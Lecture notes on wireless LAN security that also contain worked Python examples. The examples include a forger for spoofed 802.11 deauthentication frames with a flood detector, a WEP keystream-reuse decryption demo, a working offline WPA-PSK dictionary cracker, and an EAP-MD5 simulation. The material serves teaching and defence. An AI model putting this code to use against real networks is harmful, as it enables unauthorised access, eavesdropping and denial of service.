Wireless Network Security Lecture Notes

Wireless Local Area Networks (WLAN)

  • Definition: A Wireless Local Area Network (WLAN), commonly known as Wi-Fi, is a network designed to supplement or replace traditional wired Local Area Networks.
  • Functionality: WLANs provide wireless connectivity to portable endpoint devices such as tablets, smartphones, and laptops, provided they are within the transmission range of an Access Point (AP).
  • IEEE 802.11 Standards History:
    • Initial Release: The Institute of Electrical and Electronics Engineers (IEEE) released the first 802.11 standard for WLANs in 1997.
    • Evolution: The standard has undergone multiple amendments and ratifications to support increased data transfer speeds and larger data sizes.
    • Version Iterations: Key versions include IEEE 802.11b, 802.11a, 802.11g, 802.11n, 802.11ac, and 802.11ax.
  • Wi-Fi 6 (IEEE 802.11ax):
    • The most recent ratified version covered in these notes.
    • Performance: Supports data transfer speeds reaching up to 9.6 Gbps (theoretical maximum).
    • Spectrum Usage: Operates in the 2.4 GHz and 5 GHz bands, with the standard specified for the 1-6 GHz range (operation in the 6 GHz band is marketed as Wi-Fi 6E).

WLAN Hardware Components

To achieve full WLAN functionality, two primary hardware components are required beyond standard networking devices:

  • Wireless Client Network Interface Card (Wireless Adapter):
    • Installed on endpoint devices (clients).
    • Performs functions similar to a wired NIC but utilizes an antenna to send and receive signals via airwaves rather than physical cables.
  • Access Point (AP):
    • Role: Acts as a central connection point for wireless endpoints.
    • Components: Primarily comprised of an antenna and a radio transmitter/receiver.
    • Bridging Function: Serves as a bridge between wireless and wired networks by connecting to the wired infrastructure via a physical cable.

Types of Access Points (APs)

  • Small Office/Home Office (SOHO) APs:
    • Typically uses a single "wireless router."
    • Multifunctionality: Combines the roles of an AP, gateway, switch, DHCP server, and firewall into one device.
  • Enterprise Access Points:
    • Captive Portal APs: Common in public venues (airports, hotels, malls). They redirect users to a web page for password entry and acceptance of terms of use before granting access.
    • Standalone (Autonomous) APs: These are independent devices separate from other network infrastructure. They are autonomous, meaning they do not rely on a central controller for basic operations.
    • Fat APs: These contain all the internal hardware and software logic required to manage wireless authentication, encryption, and other functions locally. Managing multiple Fat APs individually in large environments is complex.
    • Thin APs: These are "lightweight" devices. They lack complex internal management logic and are instead centrally configured and managed through the switch to which they are connected. This central approach improves security by ensuring no individual AP is overlooked during configuration.
    • Controller APs: These are managed via a dedicated device called a Wireless LAN Controller (WLC). The WLC handles authentication, allowing for minimal handoff time as a user roams from the coverage area of one AP to another.

Network Boundaries: Hard Edge vs. Blurred Edge

  • Hard Edge (Wired Networks):
    • Network Hard Edge: In a wired network, a well-defined boundary exists because data typically passes through a single, controllable point.
    • Physical Hard Edge: Comprised of physical barriers like walls and buildings that restrict unauthorized physical access to network hardware.
  • Blurred Edge (Wireless Networks):
    • Introduction of WLANs creates multiple entry points into the network.
    • Because radio signals can penetrate walls, attackers can connect to the network from outside the physical building, effectively blurring the defensive perimeter.

Wireless Network Attacks

  • Rogue Access Point: An unauthorized AP set up within a network, often by an employee (insider) for convenience (e.g., better signal). Because these are often connected behind the corporate firewall, they open a backdoor for attackers to bypass security configurations.
  • Evil Twin: An AP set up by an attacker to mimic a legitimate authorized AP. It uses a similar or identical Service Set Identifier (SSID) to trick users into connecting. Once connected, the attacker can capture all user transmissions.
  • Intercepting Wireless Data: Attackers use WLAN equipment to pick up RF signals from open or misconfigured APs. This allows them to read data and gather intelligence about the wired enterprise network.
  • Wireless Denial of Service (DoS):
    • RF Jamming: The use of intentional RF interference to flood the frequency spectrum, preventing legitimate devices from communicating with the AP.
    • Disassociation/Deauthentication Attack: An attacker forges a disassociation or deauthentication frame, spoofing the MAC address of the AP (sent to the client) or of the client (sent to the AP), which forces the client off the WLAN. Repeating the frame keeps the client from reconnecting. This works because 802.11 management frames are unauthenticated unless Protected Management Frames (802.11w) are enabled; the same trick is used to force a reconnection so that the WPA handshake can be captured.
    • Duration Field Manipulation: Attackers manipulate the value in the duration field used by the Request to Send/Clear to Send (RTS/CTS) protocol. By setting a very high value, they reserve the medium for an extended period, preventing other devices from transmitting.
  • Wireless Consumer Attacks: Occur when home users fail to secure their networks. Potential consequences include data theft (via file sharing), credential harvesting (passwords, credit cards), malware injection, or the downloading of illegal/harmful content.
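The deauthentication attack described above works because nothing in an 802.11 management frame is authenticated. The following added example (it is not part of the lecture notes) builds such a frame with Python's struct module, parses it back, and runs a simple flood detector over a constructed capture; the MAC addresses, timestamps and thresholds are invented for illustration.

```python
"""802.11 deauthentication frames: why they are spoofable, and a flood detector.

Added example; not part of the lecture notes. The frame layout follows the
IEEE 802.11 management-frame header. The capture at the bottom is constructed
inline (MAC addresses and timestamps are invented), not a real trace.
"""
import struct

# Frame Control bits: protocol version (2) | type (2) | subtype (4) | flags (8).
# Management frames are type 0; the subtypes below are the ones that
# forcibly end a client's session.
SUBTYPE_BEACON, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 8, 10, 12
REASON_CLASS3_FROM_NONASSOC = 7   # reason code most attack tools send


def _mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def _mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt(subtype, dst, src, bssid, seq, body=b""):
    """Serialize a management frame. Nothing here is authenticated or
    encrypted, which is exactly why an attacker can forge the addresses."""
    fc = (0 << 2) | (subtype << 4)              # version 0, type 0 (management), subtype
    header = struct.pack("<HH", fc, 0)          # frame control, duration
    header += _mac_bytes(dst) + _mac_bytes(src) + _mac_bytes(bssid)
    header += struct.pack("<H", (seq & 0x0FFF) << 4)   # sequence number, fragment 0
    return header + body


def build_deauth(dst, src, bssid, seq, reason=REASON_CLASS3_FROM_NONASSOC):
    return build_mgmt(SUBTYPE_DEAUTH, dst, src, bssid, seq, struct.pack("<H", reason))


def parse_mgmt(frame):
    fc, _duration = struct.unpack_from("<HH", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    seq = struct.unpack_from("<H", frame, 22)[0] >> 4
    reason = None
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        reason = struct.unpack_from("<H", frame, 24)[0]
    return {"type": ftype, "subtype": subtype, "dst": _mac_str(frame[4:10]),
            "src": _mac_str(frame[10:16]), "bssid": _mac_str(frame[16:22]),
            "seq": seq, "reason": reason}


def detect_deauth_flood(capture, window_s=1.0, threshold=10):
    """Flag (src, dst) pairs that see `threshold` or more deauth/disassoc frames
    inside any sliding window of `window_s` seconds. A real AP sends these
    rarely; tens per second is an attack. `capture` is an iterable of
    (timestamp_seconds, raw_frame)."""
    recent = {}
    flagged = set()
    for ts, raw in sorted(capture, key=lambda e: e[0]):
        f = parse_mgmt(raw)
        if f["type"] != 0 or f["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue
        key = (f["src"], f["dst"])
        q = recent.setdefault(key, [])
        q.append(ts)
        while ts - q[0] > window_s:
            q.pop(0)
        if len(q) >= threshold:
            flagged.add(key)
    return sorted(flagged)


# Constructed capture: a normal beacon, one legitimate deauth, then an attacker
# spoofing the AP's address and hammering the client at 100 frames per second.
AP, CLIENT = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
CAPTURE = [(0.0, build_mgmt(SUBTYPE_BEACON, "ff:ff:ff:ff:ff:ff", AP, AP, 1)),
           (0.5, build_deauth(CLIENT, AP, AP, 2, reason=3))]   # reason 3: STA is leaving
CAPTURE += [(30.0 + i * 0.01, build_deauth(CLIENT, AP, AP, i)) for i in range(40)]

if __name__ == "__main__":
    print(parse_mgmt(CAPTURE[1][1]))
    print("flood from/to:", detect_deauth_flood(CAPTURE))
```

The detector keys on the spoofed source address, so it flags the (AP, client) pair even though the attacker's own radio never appears in the frames; a wireless IDS would add the sequence-number discontinuity between the AP's real frames and the forged ones as a second signal.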

Wireless LAN Vulnerabilities

  • Wired Equivalent Privacy (WEP):
    • An early IEEE 802.11 security protocol intended to provide confidentiality comparable to a wired network.
    • Encryption: The RC4 stream cipher with a shared secret key. The advertised "64-bit" and "128-bit" key sizes include the 24-bit IV, so the secret portion is only 40 or 104 bits.
    • Initialization Vector (IV): A 24-bit value changed per frame and prepended in plaintext to the ciphertext; the per-frame RC4 key is IV || secret key.
    • Flaw: The IV space is too small (2^24 = 16,777,216 values). On a busy AP, IVs repeat within hours, and two frames encrypted under the same IV share the same RC4 keystream, so XORing them cancels the keystream and exposes the plaintexts. Statistical weaknesses in RC4's key schedule (the FMS and later PTW attacks) go further and recover the secret key itself from a few tens of thousands of captured frames.
  • Wi-Fi Protected Access (WPA):
    • Introduced as an interim fix for WEP's flaws that could run on existing hardware: it keeps RC4 but wraps it in TKIP (per-frame key mixing, a 48-bit IV, and the Michael integrity check).
    • Modes: Personal (SOHO) and Enterprise.
    • Authentication (Personal mode): A 256-bit Pre-Shared Key (PSK) derived from the network passphrase and SSID with PBKDF2-HMAC-SHA1 (4096 iterations). Anyone who captures the four-way handshake can test passphrase guesses offline, so a short or dictionary passphrase is effectively no protection.
  • Wi-Fi Protected Setup (WPS):
    • A feature designed for easy connection via a physical button or an 8-digit PIN (often printed on a sticker).
    • Flaw: The specification does not mandate a lockout after failed PIN attempts, and the registrar confirms the first four digits and the next three digits separately (the eighth digit is a checksum). That reduces a brute-force search from 10^8 guesses to at most 10^4 + 10^3 = 11,000, which takes hours rather than years. Disable WPS wherever possible.
  • MAC Address Filtering:
    • Used to permit or block specific hardware addresses.
    • Flaw: MAC addresses appear in plaintext in every 802.11 frame header, even on encrypted networks, so an attacker can sniff an approved address and spoof it with a single interface command. It is also difficult to manage at scale in large enterprises.
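The WEP IV flaw above, as an added worked example (not code from the lecture notes): a plain RC4 implementation, the WEP frame format, the keystream-reuse attack that a repeated IV enables, and the birthday-bound probability of an IV repeat. The secret key, the IV and the two messages are constructed for the example.

```python
"""WEP keystream reuse: what a repeated IV gives an eavesdropper.

Added example; not from the lecture notes. RC4 and the WEP frame format
(IV || key-id || RC4(IV || secret, data || CRC-32)) follow the original
802.11-1997 design; the secret key and messages are made up.
"""
import math
import struct
import zlib


def rc4(key, data):
    """Plain RC4: key scheduling, then XOR data with the generated keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _icv(plaintext):
    """WEP's integrity check value is an unkeyed CRC-32 (itself a known weakness)."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(secret, iv, plaintext):
    """'64-bit WEP': 24-bit IV + 40-bit secret. The IV travels in the clear."""
    assert len(iv) == 3 and len(secret) in (5, 13)
    return iv + b"\x00" + rc4(iv + secret, plaintext + _icv(plaintext))


def wep_decrypt(secret, frame):
    iv, body = frame[:3], frame[4:]
    data = rc4(iv + secret, body)
    plaintext, icv = data[:-4], data[-4:]
    if icv != _icv(plaintext):
        raise ValueError("ICV mismatch")
    return plaintext


def recover_from_iv_reuse(frame_a, known_plaintext_a, frame_b):
    """Two frames under the same IV share a keystream. Knowing frame A's
    plaintext (e.g. a predictable ARP or DHCP packet) yields the keystream,
    which then decrypts frame B without ever learning the secret key.
    Recovery is partial if frame B is longer than the known keystream."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("IVs differ; keystreams are independent")
    keystream = _xor(frame_a[4:], known_plaintext_a + _icv(known_plaintext_a))
    recovered = _xor(frame_b[4:], keystream)
    return recovered[:len(frame_b) - 8]          # drop header (4) and ICV (4)


def iv_collision_probability(frames, iv_bits=24):
    """Birthday bound: chance that at least two of `frames` random IVs coincide."""
    n = 2 ** iv_bits
    log_no_collision = sum(math.log1p(-k / n) for k in range(frames))
    return 1.0 - math.exp(log_no_collision)


# Constructed data: a 40-bit secret and a driver that reuses IV 0x000001.
SECRET = b"\x0f\xac\x13\x37\x42"
IV = b"\x00\x00\x01"
FRAME_A = wep_encrypt(SECRET, IV, b"ARP who-has 10.0.0.1")
FRAME_B = wep_encrypt(SECRET, IV, b"GET /login?pw=hunter2")

if __name__ == "__main__":
    print(recover_from_iv_reuse(FRAME_A, b"ARP who-has 10.0.0.1", FRAME_B))
    print(f"P(IV repeat after 5000 frames) = {iv_collision_probability(5000):.2f}")
```

With random IVs the first repeat is expected after roughly 5,000 frames (a few seconds of traffic on a busy AP), and many early drivers made it worse by starting the IV counter at zero on every reboot. The FMS/PTW key-recovery attacks mentioned in the notes are a separate technique that needs only the clear-text IVs and the first keystream bytes, not a repeat.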
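The WPA/WPA2-Personal weakness above, as an added example (not code from the lecture notes): the passphrase-to-PSK derivation, the PTK/KCK derivation from the four-way handshake, and the offline dictionary attack on the captured EAPOL MIC. The key derivation steps follow IEEE 802.11i; the "captured" handshake, nonces, MAC addresses, EAPOL body and wordlist are constructed here.

```python
"""WPA/WPA2-Personal: passphrase -> PSK, and the offline dictionary attack it allows.

Added example; not from the lecture notes. Key derivation follows IEEE
802.11i (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt; PRF-512 for the PTK;
HMAC-SHA1 EAPOL MIC as used with AES/CCMP). The 'captured' handshake is
constructed with fixed nonces and a placeholder EAPOL body; only its
structure is standard.
"""
import hashlib
import hmac


def wpa_psk(passphrase, ssid):
    """PSK = PMK in Personal mode. Same passphrase + SSID always gives the same key."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]          # KCK = bytes 0-15, KEK = 16-31, TK = 32-47


def eapol_mic(kck, eapol_with_zeroed_mic):
    """Message 2 of the four-way handshake carries this MIC; it is what a cracker checks."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def handshake_as_seen_on_air(passphrase, ssid):
    """Role of the legitimate client. Everything returned here except the
    passphrase is transmitted in the clear and ends up in an attacker's capture."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = b"\x11" * 32, b"\x22" * 32   # constructed; real nonces are random
    eapol = b"<constructed EAPOL-Key message 2 with the MIC field zeroed>"
    kck = prf_512(wpa_psk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack_psk(handshake, wordlist):
    """Offline attack: no further contact with the network is needed, and the
    only cost per guess is the 4096 PBKDF2 rounds (hence GPU crackers)."""
    for guess in wordlist:
        pmk = wpa_psk(guess, handshake["ssid"])
        kck = prf_512(pmk, handshake["ap_mac"], handshake["sta_mac"],
                      handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return guess
    return None


# Constructed wordlist; the network owner chose a passphrase that is in it.
WORDLIST = ["password", "12345678", "sunshine1", "letmein99"]
CAPTURED = handshake_as_seen_on_air("sunshine1", "CoffeeShopWiFi")

if __name__ == "__main__":
    print("PSK for (password, IEEE):", wpa_psk("password", "IEEE").hex())
    print("recovered passphrase:", crack_psk(CAPTURED, WORDLIST))
```

Because the SSID is the PBKDF2 salt, precomputed tables only work per SSID, which is one more reason not to keep a default network name; the real defence is a long random passphrase, or WPA3-SAE, which removes the offline step entirely.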

Modern Security Solutions: WPA2 and WPA3

  • Wi-Fi Protected Access 2 (WPA2):
    • Replaces RC4/TKIP with CCMP (AES in counter mode with a CBC-MAC) for confidentiality and integrity.
    • WPA2 Personal Mode: Still uses a passphrase-derived PSK and the same four-way handshake, so it inherits WPA's offline-guessing weakness.
    • WPA2 Enterprise Mode: Blocks all traffic until the client provides valid credentials verified by an authentication server (e.g., using a university ID and password); each client then receives its own session keys.
  • Extensible Authentication Protocol (EAP):
    • An authentication framework (RFC 3748) that carries a chosen method (EAP-TLS, PEAP, etc.) between the supplicant, the authenticator, and the authentication server. In IEEE 802.1X deployments it travels as EAPOL over the wireless link and inside RADIUS between the authenticator and the server; the authenticator only relays the packets and never sees the credentials.
    • Packet Types: Request (from the authenticator, or from the server relayed through it), Response (from supplicant), Success (from server), and Failure (from server).
    • Authentication Process (6 Steps):
      1. Supplicant (client) asks to join the network.
      2. Authenticator (AP) asks supplicant to verify identity.
      3. Supplicant sends identity to the authenticator.
      4. Authenticator passes the identity to the Authentication Server.
      5. Authentication Server verifies the identity.
      6. Supplicant is approved to join the network.
  • Wi-Fi Protected Access 3 (WPA3):
    • Simultaneous Authentication of Equals (SAE): Replaces the PSK four-way handshake with a password-authenticated key exchange (Dragonfly). Each guess requires an active exchange with the network, so captured traffic no longer allows offline dictionary attacks, and session keys have forward secrecy.
    • Encryption: WPA3-Enterprise offers an optional 192-bit security mode (the CNSA cipher suite).
    • Protected Management Frames (802.11w) are mandatory, so forged deauthentication and disassociation frames are rejected.
    • Public/Open Wi-Fi Protection: Opportunistic Wireless Encryption (OWE, "Wi-Fi Enhanced Open") gives every client its own session key via an unauthenticated Diffie-Hellman exchange. This defeats passive eavesdropping on open networks, but because neither side is authenticated it does not stop an active attacker or an evil twin.
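The six-step EAP exchange above, as an added example (not code from the lecture notes) with all three parties' messages: a supplicant, a pass-through authenticator, and an authentication server, using the packet layout and codes of RFC 3748. The MD5-Challenge method (Type 4) is used because it fits in a few lines; real WPA2-Enterprise deployments use EAP-TLS or PEAP, since EAP-MD5 has no mutual authentication and derives no session keys. User names, passwords and the challenge source are invented.

```python
"""EAP exchange over 802.1X: supplicant, pass-through authenticator, server.

Added example; not from the lecture notes. Packet layout and codes follow
RFC 3748, using the MD5-Challenge method (Type 4) because it fits in a few
lines; real WPA2-Enterprise deployments use EAP-TLS or PEAP. User names,
passwords and the challenge source are made up.
"""
import hashlib
import hmac
import os
import struct

CODE_REQUEST, CODE_RESPONSE, CODE_SUCCESS, CODE_FAILURE = 1, 2, 3, 4
TYPE_IDENTITY, TYPE_MD5_CHALLENGE = 1, 4
CODE_NAMES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}


def eap_pack(code, ident, type_=None, data=b""):
    """Code(1) Identifier(1) Length(2) [Type(1) Type-Data]; Success/Failure carry no Type."""
    body = b"" if type_ is None else bytes([type_]) + data
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def eap_unpack(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length != len(pkt):
        raise ValueError("bad EAP length")
    return code, ident, (pkt[4] if length > 4 else None), pkt[5:]


class Supplicant:
    def __init__(self, identity, password):
        self.identity, self.password = identity, password

    def handle(self, request):
        code, ident, type_, data = eap_unpack(request)
        if type_ == TYPE_IDENTITY:                      # step 3: send identity
            return eap_pack(CODE_RESPONSE, ident, TYPE_IDENTITY, self.identity.encode())
        if type_ == TYPE_MD5_CHALLENGE:                 # prove the password without sending it
            challenge = data[1:1 + data[0]]
            value = hashlib.md5(bytes([ident]) + self.password + challenge).digest()
            return eap_pack(CODE_RESPONSE, ident, TYPE_MD5_CHALLENGE,
                            bytes([len(value)]) + value + self.identity.encode())
        raise ValueError("unsupported EAP request")


class AuthServer:
    def __init__(self, users):
        self.users, self.identity, self.challenge = users, None, None

    def initial_request(self):                          # step 2: ask who is there
        return eap_pack(CODE_REQUEST, 1, TYPE_IDENTITY)

    def handle(self, response):
        code, ident, type_, data = eap_unpack(response)
        if type_ == TYPE_IDENTITY:                      # step 4/5: identity received, challenge it
            self.identity = data.decode()
            self.challenge = os.urandom(16)
            return eap_pack(CODE_REQUEST, ident + 1, TYPE_MD5_CHALLENGE,
                            bytes([16]) + self.challenge)
        if type_ == TYPE_MD5_CHALLENGE:                 # step 5: verify
            password = self.users.get(self.identity)
            if password is not None:
                expected = hashlib.md5(bytes([ident]) + password + self.challenge).digest()
                if hmac.compare_digest(data[1:1 + data[0]], expected):
                    return eap_pack(CODE_SUCCESS, ident)   # step 6
            return eap_pack(CODE_FAILURE, ident)
        raise ValueError("unexpected EAP response")


def run_eap(supplicant, server):
    """The authenticator (AP) only relays packets and opens the port on Success.
    Returns (final code, transcript of every relayed packet)."""
    transcript = []
    pkt = server.initial_request()
    while True:
        code = eap_unpack(pkt)[0]
        transcript.append(("AP->STA", CODE_NAMES[code], pkt))
        if code in (CODE_SUCCESS, CODE_FAILURE):
            return code, transcript
        pkt = supplicant.handle(pkt)
        transcript.append(("STA->AP->server", CODE_NAMES[eap_unpack(pkt)[0]], pkt))
        pkt = server.handle(pkt)


if __name__ == "__main__":
    code, log = run_eap(Supplicant("alice", b"s3cret-pw"), AuthServer({"alice": b"s3cret-pw"}))
    for direction, name, raw in log:
        print(f"{direction:16} {name:9} {raw.hex()}")
    print("result:", CODE_NAMES[code])
```

The transcript shows the point of the pass-through design: the password never crosses the air or the authenticator, only a challenge and a digest. It also shows EAP-MD5's limit: an eavesdropper who records the challenge and digest can guess passwords offline exactly as with WPA-PSK, which is why tunnelled methods (PEAP, EAP-TTLS) or certificates (EAP-TLS) are used in practice.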

Additional Wireless Security Protections

  • Installation Best Practices:
    • Location should ensure adequate coverage and bandwidth for all users while minimizing signal "bleed" outside the building walls.
    • Site Survey Tools: Use heat maps, Wi-Fi analyzers, and channel overlays to optimize placement.
    • Optimal Placement: APs should be centrally located in the coverage area and mounted high to prevent obstruction by human bodies and to discourage theft.
  • Configuration Best Practices:
    • Signal Tuning: Reduce signal strength to limit reach outside intended areas. Adjust frequency band, channel selection, and channel width to avoid interference.
    • Home Network Hardening:
      • Change default administrator passwords for the router.
      • Use a strong passphrase for device authentication.
      • Select WPA3, or WPA2 with AES/CCMP only; disable WEP, TKIP, and WPS.
      • Change the default SSID to something that does not reveal the router model or the owner's identity.
      • Create separate Guest Networks to isolate visitors/attackers from primary devices.
      • VPNs: Highly recommended when using public wireless networks to ensure all traffic is encrypted regardless of the AP's security level.